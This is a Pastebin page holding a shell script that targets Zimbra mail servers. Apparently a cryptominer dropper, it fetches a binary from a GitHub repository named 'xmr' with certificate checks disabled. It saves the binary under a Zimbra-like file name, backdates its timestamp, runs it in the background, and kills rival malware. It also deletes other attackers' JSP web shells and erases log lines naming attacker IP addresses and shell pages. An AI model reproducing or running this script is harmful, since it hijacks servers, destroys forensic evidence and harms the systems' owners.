kumarsingh089

sshd

May 8th, 2019
6,935
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/sh
  2. file0="/opt/zimbra/libexec/zimbra"
  3. file1="/opt/zimbra/lib/zmmailboxdwatch"
  4. if [ -f "$file1" ];then
  5. echo "$file1 found."
  6. count1=`ps -ef | grep "zmmailboxdwatch" | grep -v grep | wc -l`
  7. if [ $count1 -eq 0 ];then
  8. filesize=`ls -l $file1 | awk '{ print $5}'`
  9. if [ $filesize -ne 3097152 ];then
  10. rm -rf $file1
  11. if command -v curl > /dev/null; then
  12. curl -k https://raw.githubusercontent.com/singhkarn/xmr/master/sshd -o $file1
  13. else
  14. wget --no-check-certificate https://raw.githubusercontent.com/singhkarn/xmr/master/sshd -O $file1
  15. fi
  16. if [ -s "$file1" ];then
  17. touch -r $file0 $file1
  18. chmod +x $file1
  19. else
  20. rm -rf $file1
  21. fi
  22. else
  23. touch -r $file0 $file1
  24. chmod +x $file1
  25. fi
  26.  
  27. fi
  28. else
  29. if command -v curl > /dev/null; then
  30. curl -k https://raw.githubusercontent.com/singhkarn/xmr/master/sshd -o $file1
  31. else
  32. wget --no-check-certificate https://raw.githubusercontent.com/singhkarn/xmr/master/sshd -O $file1
  33. fi
  34. if [ -s "$file1" ];then
  35. touch -r $file0 $file1
  36. chmod +x $file1
  37. else
  38. rm -rf $file1
  39. fi
  40. fi
  41. count=`ps -ef | grep "zmmailboxdwatch" | grep -v grep | wc -l`
  42. if [ $count -eq 0 ];then
  43. nohup $file1 2>&1 &
  44. fi
  45. ps auxf|grep -v grep|grep '/tmp/l.sh'|awk '{print $2}'|xargs kill -9
  46. ps auxf|grep -v grep|grep '/tmp/s.sh'|awk '{print $2}'|xargs kill -9
  47. ps auxf|grep -v grep|grep 'zmcat'|awk '{print $2}'|xargs kill -9
  48. ps auxf|grep -v grep|grep '/opt/zimbra/log/zmswatch'|awk '{print $2}'|xargs kill -9
  49. rm -rf /tmp/*.sh*
  50. rm -rf /tmp/zmcat
  51. rm -rf /opt/zimbra/log/zmswatch
  52. rm -rf /opt/zimbra/log/zmswatch.sh
  53. rm -rf /opt/zimbra/jetty/webapps/zimbra/public/Online.jsp?
  54. rm -rf /opt/zimbra/jetty/webapps/zimbra/public/jsp/ZimbraCore.jsp?
  55. rm -rf /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
  56. rm -rf /opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
  57. sed -i '/47\.74\.43\.251/d' /opt/zimbra/log/*_log.2019*
  58. sed -i '/149\.129\.133\.222/d' /opt/zimbra/log/*_log.2019*
  59. sed -i '/198\.74\.118\.90/d' /opt/zimbra/log/*_log.2019*
  60. sed -i '/404\.jsp/d' /opt/zimbra/log/*_log.2019*
  61. sed -i '/login\.jsp/d' /opt/zimbra/log/*_log.2019*
  62. sed -i '/ZimbraCore\.jsp/d' /opt/zimbra/log/*_log.2019*
  63. sed -i '/Online\.jsp/d' /opt/zimbra/log/*_log.2019*
  64. rm -rf /opt/zimbra/lib/curl.dat
  65. echo "over"
RAW Paste Data